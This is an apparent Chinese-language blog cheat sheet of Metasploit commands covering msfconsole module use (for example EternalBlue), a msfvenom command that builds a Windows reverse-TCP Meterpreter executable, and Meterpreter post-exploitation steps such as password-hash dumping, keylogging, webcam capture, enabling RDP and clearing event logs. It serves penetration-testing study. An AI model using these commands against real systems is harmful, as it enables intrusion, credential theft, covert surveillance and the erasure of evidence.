MSF常用控制命令

MSF(Metasploit Framework)的命令体系较为庞大,主要可以分为三个部分:msfconsole 控制台命令、msfvenom 载荷生成命令以及 Meterpreter 会话命令。

🖥️ msfconsole 控制台命令

这是在 Metasploit 框架主界面中使用的命令,用于查找、配置和执行攻击模块。

模块管理与执行
  • search : 搜索模块。可以根据名称、CVE编号、类型等关键词查找。
    • 示例:search eternalbluesearch cve:2024 type:exploit
  • use : 加载指定的模块。
    • 示例:use exploit/windows/smb/ms17_010_eternalblue
  • info: 显示当前或指定模块的详细信息。
  • show : 显示各类信息,常用子命令有:
    • show options: 查看当前模块需要配置的参数(标有 yes 的为必填项)。
    • show payloads: 查看当前模块支持的攻击载荷(Payload)。
    • show targets: 查看当前模块支持的目标系统。
    • show exploits: 查看所有渗透攻击模块。
    • show auxiliary: 查看所有辅助模块。
  • set : 为模块参数赋值。
    • 示例:set RHOSTS 192.168.1.100 (设置目标IP)
    • 示例:set LHOST 192.168.1.101 (设置本地监听IP)
  • exploit / run: 执行当前加载的模块,两者功能相同。
  • back: 退出当前模块,返回上一级菜单。
  • exit / quit : 完全退出 msfconsole
会话管理

当攻击成功后,会使用会话(Session)命令来管理已获取的权限。

  • sessions: 查看所有活跃的会话列表。
  • sessions -i <id>: 与指定ID的会话进行交互,例如进入 Meterpreter 命令行。
  • sessions -k <id>: 终止指定ID的会话。
  • background : 将当前会话置于后台运行,可以返回 msfconsole 主界面。
数据库操作
  • msfdb init: 初始化 Metasploit 的 PostgreSQL 数据库。
  • db_status: 检查数据库连接状态。
  • db_nmap: 调用 Nmap 进行扫描,并将结果自动存入数据库。
  • hosts: 列出数据库中记录的所有主机。
  • workspace: 管理工作区,用于隔离不同项目的数据。

🛠️ msfvenom 载荷生成命令

msfvenom 是一个独立的命令行工具,用于生成和编码 Payload(攻击载荷),例如可执行文件、脚本等。它不属于 msfconsole 内部命令。

  • 基本语法 :
    msfvenom -p <payload> <options> -f <format> -o <output_file>

  • 常用参数:

    • -p, --payload: 指定要使用的 Payload。
    • -f, --format: 指定输出格式(如 exe, elf, php 等)。
    • -o, --out: 指定输出文件的路径。
    • -e, --encoder: 指定编码器,用于绕过杀毒软件。
    • LHOST: 本地主机IP,即攻击者的IP。
    • LPORT: 本地监听端口。
  • 示例: 生成一个 Windows 系统的反向 TCP 连接 Payload。

    bash

    复制代码
    1msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o shell.exe

🎯 Meterpreter 会话命令

Meterpreter 是 MSF 功能最强大的 Payload 之一,成功连接后会进入一个交互式命令行环境,提供丰富的后渗透攻击功能。

系统操作
  • sysinfo: 获取目标系统的详细信息(操作系统、计算机名等)。
  • getuid: 查看当前 Meterpreter 会话的运行用户权限。
  • getsystem: 尝试将权限提升至 SYSTEM 级别(通常需要管理员权限)。
  • ps: 列出目标系统上的所有进程。
  • migrate <pid>: 将 Meterpreter 会话迁移到指定 PID 的进程中,以维持权限。
  • shell: 切换到目标系统的原生命令行(如 Windows 的 cmd)。
  • reboot / shutdown: 重启或关闭目标计算机。
文件系统操作
  • ls / pwd: 列出目录/显示当前路径。
  • cd: 切换目录。
  • download: 从目标机下载文件到攻击机。
  • upload: 从攻击机上传文件到目标机。
  • cat: 读取文件内容。
  • rm / del: 删除文件。
  • mkdir: 创建目录。
信息搜集与后渗透
  • hashdump: 转储 SAM 数据库,获取用户密码哈希值。

  • screenshot: 截取目标机当前桌面屏幕。

  • keyscan_start: 开始记录键盘击键。

  • keyscan_dump: 转储已记录的击键内容。

  • keyscan_stop: 停止键盘记录。

  • webcam_list: 列出目标机的摄像头。

  • webcam_snap: 使用摄像头拍照。

  • run : 执行 Meterpreter 脚本或后渗透模块,如 run scraper (搜集信息)、run post/windows/manage/enable_rdp (开启远程桌面)。

  • clearev : 清除目标机的事件日志。

    00:42

    一天一个网安技术,今天学习MSF远程控制手机


    网络安全教学中心

    01:30

    一分钟教你实现MSF远控手机(仅供网络安全技术学习)


    网络安全-老白

相关推荐
Flittly2 小时前
【SpringSecurity新手村系列】(6)基于角色的权限控制、权限拦截注解与自定义无权限页面
java·spring boot·安全·spring·安全架构
深邃-2 小时前
【Web安全】-Kali,Linux基础(3):Linux路径操作,Linux文件权限,Linux文件下载
linux·运维·安全·web安全·网络安全·系统安全
星幻元宇VR3 小时前
VR机动车模拟驾驶系统助力交通安全科普
科技·学习·安全·生活·vr
zmj32032414 小时前
UDS 0x27 安全访问(种子 / 密钥 Seed-Key) 的用法、流程、算法、存储位置、安全机制
安全·can·诊断·uds·27服务
skywalk816315 小时前
发现Kotti项目的python包Beaker 存在安全漏洞
开发语言·网络·python·安全
团子云技术16 小时前
从 HTTPS 到 LLM Agent:我们重回数字安全的黑暗时代了吗?
安全·ai编程
空中海18 小时前
Redis 专家实战:生产架构设计 × 容量规划 × 安全治理 × 37道高频面试题全解
数据库·redis·安全
南村群童欺我老无力.18 小时前
鸿蒙PC开发的路由导航参数传递的类型安全陷阱
安全·华为·harmonyos
千里念行客24019 小时前
锚定AI赛道释放红利:安凯微2026年Q1业绩显成色
大数据·人工智能·科技·安全